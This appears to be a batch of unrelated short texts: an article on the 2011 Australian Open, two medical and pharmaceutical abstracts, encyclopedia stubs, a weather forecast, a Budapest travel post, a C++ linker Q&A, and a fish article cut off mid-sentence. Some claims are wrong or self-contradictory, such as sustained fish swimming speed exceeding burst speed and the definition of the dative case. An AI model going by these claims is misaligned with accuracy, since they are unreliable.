Novak Djokovic won the Australian Open for the second time. Kim Clijsters won her first Australian Open title. In the men's doubles the Bryan Brothers won their fifth Australian Open. Gisela Dulko and Flavia Pennetta won their first Grand Slam title in the women's doubles. Daniel Nestor claimed his second mixed doubles Grand Slam alongside Katarina Srebotnik who won her fourth mixed title.
In the junior tournaments both the singles and doubles titles in the boys and girls events were won by Jiri Vesely and An-Sophie Mestach. Vesely won the doubles alongside Filip Horansky. Mestach won her doubles crown with Demi Schuurs. Vesely and Mestach won their first Grand Slam titles. They became the first players to achieve the junior double together since Kristian Pless and Virginie Razzano. They achieved this at the 1999 Australian Open.
Shingo Kunieda and Esther Vergeer both won the singles and doubles in the men's and women's wheelchair tennis events. Kunieda won his fourth Australian Open in a row, his fifth overall. In the doubles Kuneda was partnered to the title by Maikel Scheffers. Vergeer's singles win was her eighth Australian Open crown. It was also her 17th Grand Slam title overall. The final also marked the fourth time that she has not lost a game during a Grand Slam final. The win in the final was Vergeer's 404th match win in a row. Vergeer was partnered by Sharon Walraven in the doubles. In the mixed events David Wagner won the singles. Andrew Lapthorne and Peter Norfolk won the doubles competition.
Tournament
The 2011 Australian Open was the 99th edition of the Australian Open. It was held at Melbourne Park, in Melbourne, Victoria. The tournament was an event run by the International Tennis Federation (ITF). It was part of the 2011 ATP World Tour and the 2011 WTA Tour calendars. The tournament consisted of men's and women's singles and doubles draws as well as a mixed doubles event. There was also singles and doubles events for boys and girls (players under 18). The tournament was part of the Grade A group of tournaments of the junior tour. There was also events for wheelchair tennis players (they competed in three categories: men, women and quadipedic) as part of the NEC tour. The tournament was played on hard courts. The three biggest courts used were the Hisense Arena, the Margaret Court Arena and the Rod Laver Arena.
Points and prize money
Point distribution
Below is a series of tables for each of the competitions showing the ranking points on offer for each event.
Seniors points
Junior points
Wheelchair points
Prize money
The 2011 Australian Open offered record prize money to both men and women. It had a total of A$25 million (US$24 million), up 3.8% on the total prize money from 2010. The winners of the singles titles took home A$2.2 million (US$2.1 million). The finalists finalists were given A$1.1 million (US$1 million). Below is the list of prize money given to each player in the main draw of the professional competitions; all prize money is in Australian dollars (A$). Prize money for the doubles is given as a team.
Men's and Women's Singles
Winners: $2,200,000
Runners-up: $1,100,000
Semi-finalists: $420,000
Quarter-finalists: $210,000
Fourth round: $93,000
Third round: $54,500
Second round: $32,000
First round: $20,000
Men's and Women's Doubles
Winners: $454,500
Runners-up: $227,250
Semi-finalists: $113,000
Quarter-finalists: $56,000
Third round: $31,500
Second round: $17,200
First round: $9,600
Mixed Doubles
Winners: $135,500
Runners-up: $67,500
Semi-finalists: $33,900
Quarter-finalists: $15,500
Second round: $7,800
First round: $3,800
Events
Seniors
There were five competitions open to professional tennis players. The Association of Tennis Professionals and Women's Tennis Association awarded ranking points in all events apart from the mixed doubles. The singles draws were contested by one hundred and twenty eight players. Sixty four teams took part in the doubles events. Thirty two teams lined up in the mixed doubles competition.
Men's Singles
At the start of the 2011 Australian Open, World Number one Rafael Nadal was on the edge of history. He had a chance to become the first man since Rod Laver in 1969 to hold all four Grand Slams at the same time. He had won the previous three. This would not be the Grand Slam, but the media had named it the "Rafa Slam." The name came from the "Serena Slam" which was used when Serena Williams won all four Grand Slam titles in a row.
Nadal was the number one seed and led the field. The other top ten seeds were; sixteen time Grand Slam champion, Roger Federer, 2008 Australian Open winner Novak Djokovic, two time Grand Slam finalists Robin Soderling and Andy Murray, Wimbledon runner up Tomas Berdych, David Ferrer, 2003 US Open champion Andy Roddick, Fernando Verdasco and Mikhail Youzhny.
The start of the 2011 Australian Open saw all the seeds make it to the second round. But Gulbis, Querrey, who lost in the fifth set 8-6 and Davydenko did not win. Montanes, Fish, Monfils, Baghdatis, Tsonga, Bellucci and Nalbandian won their matches in the final set. The second round saw Michael Llodra lose to qualifier Milos Raonic, Feliciano Lopez who went out to Wildcard Bernard Tomic, Juan Monaco lost to Robin Haase, Fish lose to Robredo and Montanes lost to Malisse. While Nalbandian had to retire against Berenkis and Bellucci lost 8-6 in the final set to Hernych. Youzhny, Verdasco, Almagro and Federer all survived final set deciders to progress to the third round. Raonic continued his form from the previous round as he upset Youzhny this time in four sets, the biggest upset to date. While Alexandr Dolgopolov upset Tsonga, coming back two sets to one down. The third round is also where the seeds meet for the first time, so Garcia-Lopez, Baghdatis, Gasquet, Ljubicic and Troicki all exited to higher seeds. Although Stanislas Wawrinka who was the nineteenth seed managed to defeat Gael Monfils the twelfth seed in straight sets. While Marin Cilic, semifinalist from 2010 defeated John Isner 9-7 in the final set. The fourth round saw Ferrer end Raonic's run, and Dolgopolov edge out Soderling in the final set for the biggest upset in the tournament to date. There were also wins for Berdych, Djokovic, Federer, Murray and Nadal, all except Federer eliminated other seeds. There was one other upset as nineteenth seed Wawrinka beat Roddick in straight sets.
Djokovic, Federer and Murray successfully made their way into the semifinals, however the upset of the tournament happened as Nadal went out. The "Rafa Slam" attempt came to an end on Australia Day in straight sets against Ferrer, a year to the day since Nadal last lost a Grand Slam match. The semifinals witness Djokovic taking out Federer in straight sets while Murray overcame Ferrer the next night in four sets. In the final Djokovic defeated Murray for his second Australian Open crown in straight sets.
Championship match result
Novak Djokovic def. Andy Murray, 6-4, 6-2, 6-3.
Women's Singles
The 2011 women's draw was missing its defending champion Serena Williams who pulled out in late 2010 due to ligament damage. World number one Caroline Wozniacki of Denmark was the number one seed. The Dane headed up the top ten seeds which included Vera Zvonareva, three time US Open champion Kim Clijsters, seven time Grand Slam champion Venus Williams, Samantha Stosur, reigning French Open Champion Francesca Schiavone, Jelena Jankovic, Victoria Azarenka, Li Na and Shahar Pe'er. Former Grand Slam champions, Justine Henin, Ana Ivanovic, Svetlana Kuznetsova and Maria Sharapova were also seeded.
The start of the 2011 Australian Open saw all the seeds apart from Rezai, Hantuchova, Dulgheru. The biggest upset of the first round was Ivanovic losing 10-8 in the final set to Ekaterina Makarova while Schiavone survived after being a set down to win the final set. The biggest loser in the second round was Jankovic as she lost to Peng in straight sets. The Serb was not the only seed to exit though as Iveta Benesova defeated Maria Kirilenko, Martinez-Sanchez lost to Cornet, Kleybanova, Kanepi, Pironkova, Bartoli and Wickmayer all joined her on the plane home. While Schiavone had to survive another final set decider this time winning it 9-7. The third round saw Kutznetsova defeat Henin, in what turned out to be the Belgium's last ever match as she announced her retirement in the second week of the tournament. Whilst Andrea Petkovic had a virtual bye into round four as Williams retired after just seven points of their match. Makarova caused another upset as she knocked out Nadia Petrova while Benesova defeated Anastasia Pavlyuchenkova in the final set. Other seeds who went out to other seeded players were Cibulkova, Peer who lost in the final set. While Petra Kvitova ended home hopes as she disposed of Stosur, while Sharapova had to come from a set down to progress to the next round.
The fourth round witnessed women's tennis history, as the match between Kuznetsova and Schiavone broke records. The match became the longest match, in terms of time for women in a Grand Slam as it lasted for 4 hours, and 44 minutes. At 8-7 in the final set Kutznetsova had three match points, but the Italian saved all three. In the next game Schiavone broke her opponents serve but touched the net after hitting the winner, meaning the point went to Kutznetsova, when holding three break points. Kutznetsova had another three match points in the next game before a run of four games in a row where the serve was broken. Finally after breaking in the previous game and missing three match points Schiavone closed the match out to win 16-14 in the final set. Other fourth round matches saw Sevastova's run end against Wozniacki and Makarova's end against Clijsters, while Petkovic upset Sharapova in straight sets. Other upsets saw the seeded players of Li and Kvitova defeat higher seeded players.
The quarterfinals witnessed Wozniacki put an end to Schiavone's run by winning a final set decider. Into the semifinals with the Dane were Li who defeated Petkovic, Clijsters who defeated Radwanska and Zvonerava who took care of Kvitova. In the first semifinal Li caused an upset, as she saved match point, to defeat the world number one Wozniacki in three sets. Her opponent in the final, Clijsters, won in straight sets against Zvonerava. In the final Clijsters came from a set down to claim her first Australian Open title. It was her fourth grand slam title in her career and second consecutive slam having won the US Open in 2010.
Championship match result
Kim Clijsters def. Li Na, 3-6, 6-3, 6-3.
Men's Doubles
The 2011 men's doubles competition saw the two-time defending champions and four-time champions overall come back to defend the two previous titles in the team of Bob and Mike Bryan, which they were the number one seeded team in the draw. Out of all of the seeded players, the teams that lost in the first round were the teams of 7th seeded Lukas Dlouhy and Paul Hanley, 9th seeded team of Wesley Moodie and Dick Norman, 11th seeds Robert Lindstedt and Horia Tecau, Nicolas Almagro and Marc Lopez the 15th seeds, Marcelo Melo and Bruno Soares the 16th seeded team. Those teams that lost in the second round of the event are the two teams of Mark Knowles and Michal Mertinak the 12 seeds, and the 14th seeded Jonathan Erlich and Andy Ram. The only third round exit was by 13th seeded Marcel Granollers and Tommy Robredo. All of the top eight seeds made the quarterfinal or better with the lone exception of the seventh seeded team. Lastly, this event saw four teams exit in the quarterfinal round, which those was the 4th seeded team of Lukasz Kubot and Oliver Marach, Mariusz Fyrstenberg and Marcin Matkowski the 5 seeded team, the 6th seeded and 2010 Wimbledon Champions Jurgen Melzer and Philipp Petzschner, and the 8th seeded team of Michael Llodra and Nenad Zimonjic.
Thus, only three seeded teams survived to make it to the semifinals, which the lone team to lose during this stage was the second seeded team of Max Mirnyi and Daniel Nestor. This set up a dynamic final of the 1st and 3rd seeded teams respectively in the Bryan Brothers and the Indian duo of Mahesh Bhupathi and Leander Paes, which the Indian team never has won the Australian Open in men's doubles. This would be the third time that they would lose in the final, but albeit in different years.
So, this was the Bryan Brothers' fifth Australian Open title in Men's doubles in the past six years, which this win was the third consecutive title at the event for them having won in 2009 and 2010, and the other two years they won were in 2006 and 2007. This was the Bryan Brothers tenth Men's Doubles Grand Slam title for their careers.
Championship match result
Bob Bryan / Mike Bryan def. Mahesh Bhupathi / Leander Paes, 6-3, 6-4.
Women's Doubles
The 2011 women's doubles competition was wide open with no team in the field having previously won a grand slam. Argentina's Gisela Dulko and Flavia Pennetta of Italy led the field as the number one seeds, who had won seven titles in 2010 including the WTA championships but they had never been past a Grand Slam semifinal. Second seeds were the French Open finalists Kveta Peschke and Katarina Srebotnik, who had already won a tournament in 2011, the ASB Classic. Number three seeds are the US Open finalists Liezel Huber and Nadia Petrova; the number four seeds are the 2009 WTA Champions Nuria Llagostera Vives and Maria Jose Martinez Sanchez with Cara Black and Anastasia Rodionova seeded fifth heading the field.
All the seeds made it through the opening round with the exception of Francesca Schiavone and Rennae Stubbs, who lost winning just five games in what is Stubbs' last Australian Open. In round two the biggest casualties were the departure of the number four seeds; Llagostera Vives and Martinez Sanchez in straight sets. In the third round the number six, seven and eighth seeds all crashed out. In the quarterfinals Huber won the battle of the ex-partners as she downed Black's team to set up a semi final with Dulko and Penetta. The other semi was filled by Azarenka and Kirilenko and the number two seeds. In the semis the Number one seeds advanced to the final where after a shock they faced Azerenka and Kilrenko. In the final Dulko and Pennetta came from a set down to win.
Championship match result
Gisela Dulko / Flavia Pennetta def. Victoria Azarenka / Maria Kirilenko, 2-6, 7-5, 6-1.
Mixed Doubles
The mixed doubles field was led by top seeds and US Open champions Bob Bryan and Liezel Huber. Other significant seeds were: number two seeds Daniel Nestor and Katarina Srebotnik, Nestor's ex-doubles partner Nenad Zimonjic and Maria Kirilenko are the third seeds. Fourth seeds were defending champions Leander Paes and Cara Black, while the fifth and sixth seeds were Aisam-ul-Haq Qureshi and Kveta Peschke and Wesley Moodie and Lisa Raymond.
All the seeded teams made it through the first round apart from the teams of Aisam-ul-Haq Qureshi and Kveta Peschke who lost to Rennae Stubbs and Chris Guccione and Moody and Reymond who lost to Horia Tecau and Bethanie Mattek-Sands. The second round witnessed the number one seeds Bryan and Huber withdraw and the defending champions, Paes and Black go out to Paul Hanley and Chan Yung-jan after two tiebreak sets. The quarterfinals saw no upsets as Nestor and Srebotnik, Zimonjic and Kirlienko, Hanley and Chan and Tecau and Mettek-Sands made the semifinals. In the semifinals Nestor and Srebotnik won in straight sets against Zimonjic and Kirilenko. Their opponents in the final were Hanley and Chan after they won a match tiebreak 11-9 against Tecau and Mettek-Sands. The final came down to a match tiebreak which the number two seeds, Nestor and Srebotnik won. It was Nestor's second Australian Open mixed title while for Srebotnik it was her first.
Championship match result
Katarina Srebotnik / Daniel Nestor def. Chan Yung-jan / Paul Hanley, 6-3, 3-6, 10-7.
Juniors
Sixty four players competed in the boys and girls singles events, with thirty two teams competing in the boys and girls doubles events. The event is one of nine ITF Grade A junior competitions. Qualifying for the main draw took place between the 20 and 21 January 2011. Sixty four players attempted to qualify for the main draw of the boys and girls singles. There were eight qualifying spots available to join the forty six direct acceptance, two special exemptions and eight wildcards in the main draw. The qualifying event was held at the Pakenham Regional Tennis Centre. The main draws took place between the 23 and 29 January 2011.
Boys' Singles
World number one Jiri Vesely led the field. Other top seeds included World number two Dominic Thiem, Orange Bowl Champion George Morgan and World number five Mate Pavic. In the first round of the tournament Pavic exited in straight sets to Karim Hossam. While fellow seeds Dimitri Bretting, Joris De Loore and Ben Wagland also went out of the tournament. Also in action was Vesley and the 2010 finalist Sean Berman who both won their opening matches. Luke Saville casued the biggest upset in the second round as he outsted World number two Thiem in straight sets while Vesely and Morgan progressed with straight sets wins. The third round saw Morgan and Saville win epics in the final set. The quarterfinals saw Vesely, Morgan Baena and Saville reach the semifinals, where Vesely and Saville reached the final. In the final Vesely claimed his first junior Grand Slam title as he lost just three games against home hope Saville.
Championship match result
Jiri Vesely def. Luke Saville, 6-0, 6-3.
Girls' Singles
The 2011 Australian Open girls field was led by the World number one, US Open and youth Olympic champion, Daria Gavrilova. Joining the Russian leading the field was An-Sophie Mestach, Irina Khromacheva and Monica Puig. While Orange Bowl champion Lauren Davis who competed in the main draw of the women's singles was the third seed and she was also joined by Caroline Garcia who also appeared in the women's draw. The first round saw all of the seeds bar Natalija Kostic move into the second round. Gavrilova, however was not in the second round as she was dumped out in straight sets by fifteen year old Kanami Tsuji Puig, in the second round got rid of the last of the home contingent losing just two games in the process. Eugenie Bouchard caused the biggest upset of round three when she lost just three games against Davis. Garcia caused an upset in the quarterfinals as she upset the number four seed Khromacheva in straight sets. The semifinals witnessed Mestach drop her first and only set of the tournament when she defeated Garcia whilst Puig saw off Bouchard in straight sets. In the final Mestach defeated Puig in straight sets to win her first junior Grand Slam title.
Championship match result
An-Sophie Mestach def. Monica Puig, 6-4, 6-2.
Boys' Doubles
The first round witnessed Dimitri Bretting and Dennis Novak the fifth seeds and seventh seeds Luis Patino and Filip Peliwo exit at the first hurdle. All the remaining seeds made it to the quarterfinals, where the number one seeds George Morgan and Mate Pavic who exited to the eighth seeds Mitchell Krueger and Karue Sell in a match tiebreak while second seeds Filip Horansky and Jiri Vesely knocked out sixth seeds Dominic Thiem and Matthias Wunner. Horansky and Vesely reached the final after defeating the fourth seeds Joris de Loore and Mate Delic who received a bye in the previous round in straight sets. While third seeds Ben Wagland and Andrew Whittington took care of Krueger and Sell in a match tiebreak. Horansky and Vesely triumphed in straight sets in the final over Wagland and Whttington.
Championship match result
Filip Horansky / Jiri Vesely def. Ben Wagland / Andrew Whittington, 6-4, 6-4.
Girls' Doubles
All the seeds made it through the first round with out incident. Nastja Kolar and Danka Kovinic the fifth seeds, Tang Haochen and Tian Ran the seventh seeds and the biggest upset with the second seeds Eugenie Bouchard and Monica Puig all went out in the second round. In the quarterfinals An-Sophie Mestach and Demi Schuurs sent the number one seeds Irina Khromacheva and Yulia Putintseva home for the loss of just three games. While Margarita Gasparyan and Daria Gavrilova the fourth seeds lost a match tiebreaker to Eri Hozumi and Miyu Kato whilst Lucia Butkovska and Anna Schmiedlova the eighth seeds won only one game. Kato and Hozumi progressed to the final, where they faced Mestach and Schuurs who knocked out the third seeds Natalija Kostic and Ilona Kremen in a match tiebreaker. In the final Mestach and Schuurs defeated Hozumi and Kato in straight sets for their first Grand Slam doubles title.
Championship match result
An-Sophie Mestach / Demi Schuurs def. Eri Hozumi / Miyu Kato, 6-2, 6-3.
Wheelchair tennis
There are six events in the wheelchair tennis discipline; a singles and doubles draw for each of the three categories. The tournament was played between the 26 and 29 January 2011. All events were part of the NEC tour under the Grand Slam category. A total of $63,000 was awarded in prize money across all the events.
Wheelchair Men's Singles
In the opening round World number one Shingo Kunieda defeated Ronald Vink for the loss of just one game. Kunieda would play Robin Ammerlaan in the semifinals after the Dutchman defeated home hope Ben Weekes. In the other half of the draw Stephane Houdet saw off Maikel Scheffers while Stefan Olsson saw off Houdet's doubles partner Nicolas Peifer. In the semifinals Kunieda and Houdet emerged victorious in the battle for the final. Kunieda defeated Houdet for his twelfth Grand Slam title losing just three games.
Championship match result
Shingo Kunieda def. Stephane Houdet, 6-0, 6-3.
Wheelchair Women's Singles
There were eight entries into the singles competition. On her first appearance in a Grand Slam competition Marjolein Buis won in three sets against Annick Sevenans to reach the semifinals. Also into the semifinals were World number one Esther Vergeer who recorded her four hundred and second consecutive match win with a 6-0, 6-0 win over her doubles partner, Sharon Walraven. Buis then took on World number two and home favourite Daniela di Toro who lost just three games on Australia Day against Aniek van Koot. While Jiske Griffioen would play Vergeer in the semifinals after defeating Grand Slam debuant Jordanne Whiley in straight sets. The semifinals witnessed di Toro and Vergeer make the final with straight sets wins. In the final Vergeer claimed her eighth Australian Open title as she defeated di Toro without losing a game to chalk up her four hundredth and fourth consecutive win.
Championship match result
Esther Vergeer def. Daniela di Toro, 6-0, 6-0.
Wheelchair Quad Singles
The tournament was played in a round robin format. Peter Norfolk, the defending champion, opened with a straight sets win over doubles partner Andrew Lapthorne. Whilst World number one David Wagner defeated his doubles partner Nick Taylor for the loss of two games. In the second round of matches Wagner edged Norfolk in a final set decider, whilst Grand Slam debuant Lapthorne recorded his first victory as he won in straight sets against Taylor. The loss for Taylor meant that he was elminated from the event. In the final round robin matches, Norfolk defeated Taylor for the loss of just three games, while Wagner defeated Lapthorne in straight sets. The win for Norfolk and the loss for Lapthorne meant that Norfolk would play Wagner in the final. In the final Wagner defeated Norfolk for the loss of just five games. It was Wagner's first Australian Open singles title.
Championship match result
David Wagner def. Peter Norfolk, 6-2, 6-3.
Wheelchair Men's Doubles
There was four teams competing in this event. Shingo Kunieda and Maikel Scheffers beat Wimbledon champions, Robin Ammerlaan and Stefan Olsson in straight sets. They were joined in the final by the all French pairing of Stephane Houdet and Nicolas Peifer who defeated Ronald Vink and Ben Weekes. In the final Kunieda and Scheffers came from a break down in the first set to defeat the French pair in straight sets.
Championship match result
Shingo Kunieda / Maikel Scheffers def. Stephane Houdet / Nicolas Peifer, 6-3, 6-3.
Wheelchair Women's Doubles
There were four entries to this competition. Esther Vergeer and Sharon Walraven defeated Daniela di Toro and Jordanne Whiley in straight sets to make the final. The final was turned into an all Dutch affair as Aniek van Koot and Jiske Griffioen joined them after defeating Marjolein Buis and Annick Sevenans in two tiebreaks. In the final Vergeer and Walraven lost just two games as they defeated van Koot and Griffioen to claim their third consecutive Grand Slam title.
Championship match result
Esther Vergeer / Sharon Walraven def. Jiske Griffioen / Aniek van Koot, 6-0, 6-2.
Wheelchair Quad Doubles
There was just two entries in the Quad doubles, and they played a straight final to decided the championship. In the one off match history was made as Lapthorne and Norfolk became the first all British pair to win a wheelchair Grand Slam doubles title. It was Lapthorne's first Grand Slam title and Norfolk's first Grand Slam doubles title as the pair defeated the all American pair of Taylor and Wagner in straight sets for their fourth win over them.
Championship match result
Andrew Lapthorne / Peter Norfolk def. Nicholas Taylor / David Wagner, 6-3, 6-3.
Viewership
Broadcast
The 2011 Australian Open was broadcast around the world with eleven different broadcasters officially screening the event. Channel 7 was the host broadcaster, with ESPN covering North America with its International franchise covering South and Latin America. Eurosport holds the rights to broadcast the tournament in Europe. In Asia broadcasts were covered by ESPN Star Sports and in Japan by WOWOW and by CN Sports Interactive Media Group in China. In Africa coverage is by SuperSport, and in the middle east by Abu Dhabi TV. Pacific coverage was broadcast by Sky New Zealand in New Zealand and by FIJI TV in Fiji. During the course of the tournament, Tennis Australia and Eurosport, announced that they had extended their partnership for another five years, which extends Eurosports unbroken coverage of the Australian Open to over twenty years. For the first time in the history of the Australian Open, the qualifying competition for the main draw was streamed live on the internet. The qualifying competition was broadcast between 12 and 15 January. The charity event Rally for Relief was also broadcast live on australianopen.com and Australian network channel seven.
During the first week of the tournament, viewing figures in Australia were down for the second year running. 1.36 million people tuned in for the Men's singles final which was lower than the rating which the women's final received according to figures released by OzTAM.
Attendance
2011 introduced a kids tennis day event, which took place on the Saturday before the tournament took place. Around eight thousand people turned up for the event. People entertained themselves through a variety of activities, including watching stringers string racquets and arts and crafts. The highlight of the day for many fans was a chance to watch past and present players. These players included, Pat Cash, Henri Leconte, Peter Luczak, Alicia Molik and Anastasia Rodionova.
A total of 651,127 people attended the tournament throughout the two weeks. This was lower than the attendance in 2010, although daily records were set. 51,276 people filled Melbourne Park, which was a record for the middle Saturday. The day was also the biggest crowd ever at the Australian Open for a day session. A further 25,845 attended the evening session which brought the total number of people for the day to 77,121 which was again record breaking. As it was the largest amount of spectators to have attended on one day. |
Implantation of transvenous nonthoracotomy cardioverter-defibrillator systems in patients with permanent endocardial pacemakers.
Among 177 patients in whom a nonthoracotomy approach was initially used to implant a cardioverter-defibrillator system, 11 (6%) patients also received a separately implanted permanent pacemaker. The main problem encountered in these patients were previously implanted unipolar pacemakers (n = 3) and ventricular pacing leads positioned at the right ventricular apex, the latter interfering with optimal placement of the tripolar implantable cardioverter-defibrillator (ICD) lead (n = 9). The approaches used to solve these problems were individualized and included placement of the ICD sensing lead at the right ventricular outflow tract (n = 3), initial placement (n = 1) or subsequent repositioning (n = 2) of the right ventricular pacing lead at the outflow tract, upgrade from unipolar to bipolar systems (n = 2), reprogramming from the DDD to AAI mode (n = 2), inactivation of the pacemaker (n = 1), and simultaneous placement of a single-chamber atrial pacemaker with the ICD lead (n = 2). These revisions fulfilled the pacing needs in each patient and prevented unfavorable sensing interaction between the two systems. |
Hallevik is a locality in Solvesborg Municipality in Blekinge County in Sweden. In 2010, 813 people lived there. |
Influence of carrier surface fines on dry powder inhalation formulations.
The performance of carrier-based dry powder inhalation formulations strongly depends on particle interactions between the drug and the carrier. Among other factors like particle size and shape, surface properties of the interacting partners play a decisive role. This study aims at investigating the effect of carrier surface characteristics on the in vitro deposition of ordered mixtures containing salbutamol sulfate as a drug and lactose and mannitol as model carrier compounds. The wet decantation method was used to remove the carrier fines adhered to the carrier surface and to obtain smoother carrier surfaces. In vitro deposition was investigated using the Next Generation Impactor. In comparison to the formulations containing untreated carriers, the removal of carrier fines by wet decantation leads to a reduced in vitro deposition. This is possibly caused by an increase in the surface smoothness and an increase in the number of high energetic spots. |
A soakage, or soak, is a source of water in the deserts of Australia. It is called a soak because the water generally soaks into the sandy ground, and is stored below. They sometimes form part of an ephemeral river or drainage system. Soakages were traditionally important sources of water for Aboriginal people in the desert, because they are the most reliable sources in times of drought. Knowing the exact location of each soakage was very valuable knowledge. In the 19th century, the explorers Peter Warburton and David Carnegie wrote that they had chased down Aboriginal people with camels and captured and chained them to force them to reveal their secret sources of water. |
Starkville, MS (39762)
Today
Sunshine and clouds mixed. High 87F. Winds N at 10 to 15 mph..
Tonight
Partly cloudy early followed by cloudy skies overnight. Low 61F. Winds NNW at 5 to 10 mph. |
A free kick is a kick awarded to the other team because of a foul, which is committed by another player. Free kicks appear in many different ball sports, like association football.
Football (soccer) terminology |
Sojourners and Stairs Part 2
We were wowed by the view. But our amazement was premature. Little did we know if we kept walking, we would see one of THE best views.
The steeple turned into a church.
The Matthias Church to be exact.
What we didn’t know at the time was what the Matthias Church was. We found out later that this church, along with the Fisherman’s Bastion, are #7 and #2 on TripAdvisor’s Top 10 in Budapest list. The Matthias Church (in Hungarian: Mátyás-templom) is a Gothic style Roman Catholic church that was built in the 1015, rebuilt in the 14th century, and later restored in the 19th century.
This church is located in front of the Fisherman’s Bastion:
This Bastion (Halászbástya) has 7 towers, 4 of which are pictured, that represent the 7 Magyar tribes that settled in the late eight hundreds. It is located on Castle Hill on the Buda side and overlooks the Danube.
And what a view it was.
We were just out for a stroll and had NO IDEA all those steps would lead to this breathtaking view. It was cloudy so our view was hindered, but I can only imagine how far you could see on a clear day!
The Bastion and and the church weren’t the only things to explore on Castle Hill.. with a name like that there must be a castle here somewhere. So we set out exploring to find the castle.
This slideshow requires JavaScript.
We soon grew hungray (pun intended) and changed our course: food first, castle later. We came across one of my new favorite places in all of Budapest – Tárnok Cafe & Bier.
The food was delicious, the service was marvelous, and the prices were exceptional. But more on the at later. Keep your eyes peeled for a Hungry in Hungary post. |
In grammar, the dative case is the grammatical case used to show the object of an action (the thing the verb acts on).
For example, "Maria gave Jacob a drink". In this example, Jacob is the dative as he is being given the drink, he is what the verb ("gave") is acting upon.
Grammar |
Q:
undefined reference to 'abc::abc()' with Dwarf Error: Offset appearing
I declare an obj :
#include "abc.h"
class xxx
{
public:
xxx();
~xxx();
abc* q;
...
};
in the .cpp file i do the following
this->q=new abc(); <-error on this line with undefined reference to abc::abc()
In the console it also appears this error:
Dwarf Error: Offset (76195) greater than or equal to .debug_str size
(1472).
anyone knows what could be wrong? i'm using eclipse, fedora 14
A:
undefined reference to abc::abc()
It is an Linking error which tells you that the linker could not find the definition for abc::abc().
Most likely, You only declared but did not define the no argument constructor for class abc.
In your cpp file you should have:
abc::abc()
{
}
If you already have it in place then, You should ensure that the source cpp file which has this definition is being properly linked to your project.
|
Fish (plural: fish or fishes) are a group of animals with bones which live in water and respire (get oxygen) from their gills.
Fish used to be a class of vertebrates. Now the term covers five classes of animals that live in the water:
Jawless fish
Armoured fish
Cartilaginous fish
Ray-finned fish
Lobe-finned fish
There are more fish than four-limbed animals: there are over 33,000 described species of fish. Fish are usually covered with scales. They have two sets of paired fins and several unpaired fins. Most fish are cold-blooded (poikilotherm).
There are many different kinds of fish. They live in fresh water in lakes and rivers, and in salt water in the oceans. Some fish are less than one centimeter long. The largest fish is the whale shark, which can be almost 15 meters long and weigh 15 tons. Almost all fish live in the water. A group of fish called the lungfish have developed lungs because they live in rivers and pools which dry up in certain parts of the year. They burrow into mud and aestivate until the water returns.
The English word "fish" does not fit neatly into cladistics, which is the scientific way to put living things into groups. So scientists call it a paraphyletic word. This means that the animals called "fish" in English do not fit into just one phylum. Some fish are more closely related to land animals than they are to other fish. For example, lobe-finned fish were the first animals with bones to come live on land, and all land animals are their descendants. Lobe-finned fish are more closely related to humans than to ray-finned fish.
Types of fish
"Fish" is not a formal taxonomic grouping in systematic biology. Amphibians, reptiles, birds and mammals all descended from lobe-finned fish. But the use of the term "fish" is so convenient that we go on using it.
Fish are the oldest vertebrate group. The term includes a huge range of types, from the Middle Ordovician, about 490 million years ago, to the present day. These are the main groups:
Agnatha: the jawless fish. Cambrian to present day.
Pteraspids: the head-shields
Anaspids: gills opened as holes. Silurian to end-Devonian.
Cephalaspids: early jawless fish
Lampreys: living ectoparasites
Osteostraci: bony-armoured jawless fish.
Gnathostomata: the jawed fish. Includes all types commonly called fish, except the lamprey.
Placoderms: heavily armoured fish
Chondrichthyes: cartilaginous fish: sharks, rays and skates.
Acanthodii: extinct spiny sharks
Osteichthyes: bony fish.
Actinopterygii: the ray-finned fish.
Chondrostei: sturgeons and some other early types.
Neopterygii: first seen in the later Permian, lighter and faster-moving than previous groups.
Holostei: the gars and bowfins
Teleostei: the most successful group, Triassic to present day.
Sarcopterygii: the lobe-finned fish
Dipnoi: the lungfish; eight genera survive.
Coelacanths: two species survive. They were probably a sister-group to the tetrapods.
Certain animals that have the word fish in their name are not really fish: crayfish are Crustacea, and jellyfish are Cnidaria. Some animals look like fish, but are not. Whales and dolphins are mammals, for example.
Anatomy
Bony and cartilaginous fish
Most kinds of fish have bones. Some kinds of fish, such as sharks and rays, do not have real bones. Their skeletons are made of cartilage, and so they are known as cartilaginous fish.
Fish scales
All fish are covered with overlapping scales, and each major group of fish has its own special type of scale. Teleosts ('modern' fish) have what are called leptoid scales. These grow in concentric circles and overlap in a head to tail direction like roof tiles. Sharks and other chondrichthyes have placoid scales made of denticles, like small versions of their teeth. These also overlap in a head to tail direction, producing a tough outer layer. Shark skin is available for purchase as shagreen, a leather which as original is smooth in one direction, and rough in the other direction. It may be polished for use, but is always rough in texture and resistant to slipping.
The scales are usually covered with a layer of slime which improves passage through the water, and makes the fish more slippery to a predator.
There are various types of eel: most are in the Anguilliformes. Their life-style has evolved many times. Eels have scales with smooth edges or are absent.
Freshwater fish
41% of all fish live in freshwater. There are also some important fish which breed in rivers, and spend the rest of their life in the seas. Examples are salmon, trout, the sea lamprey, and three-spined stickleback. Some fish are born in salt water, but live most of their mature lives in fresh water: for example the eels.
Species like these change their physiology to cope with the amount of salt in the water.
Swimming
Fish swim by exerting force against the surrounding water. There are exceptions, but this is usually done by the fish contracting muscles on either side of its body. This starts waves of flexion which travel the length of the body from nose to tail, generally getting larger as they go along.
Most fishes generate thrust using lateral movements of their body & tail fin (caudal fin). However, there are also species which move mainly using their median and paired fins. The latter group profits from the gained manoeuvrability. This is needed, for example, when living in coral reefs. Such fish cannot swim as fast as fish using their bodies & caudal fins.
Muscle
Fish can swim slowly for many hours using red muscle fibres. They also make short, fast bursts using white muscle. The two types of muscle have a fundamentally different physiology. The red fibres are usually alongside a much greater number of white fibres.
The white fibres get their energy by converting the carbohydrate glycogen to lactate (lactic acid). This is anaerobic metabolism, that is, it does not need oxygen. They are used for fast, short bursts. Once the lactic acid builds up in the muscles, they stop working, and it takes time for the lactate to be removed, and the glycogen replaced. Using their white fibres, fish can reach speeds of 10 lengths per second for short bursts.
Swimming for long periods needs oxygen for the red fibres. The oxygen supply has to be constant because these fibres only operate aerobically. They are red because they have a rich blood supply, and they contain myoglobin. Myoglobin transports the oxygen to the oxidising systems. Red muscle gets its energy by oxidising fat, which weight for weight has twice as much energy as carbohydrate or protein. Using their red fibres, fish can keep up a speed of 35 lengths per second for long periods.
Swimming in groups
Many fish swim in groups. Schools of fish can swim together for long distances, and may be chased by predators which also swim in schools. Casual groups are called 'shoals'.
Body shape
The shape of the body of a fish is important to its swimming. This is because streamlined body shapes makes the water drag less. Here are some common fish shapes:-
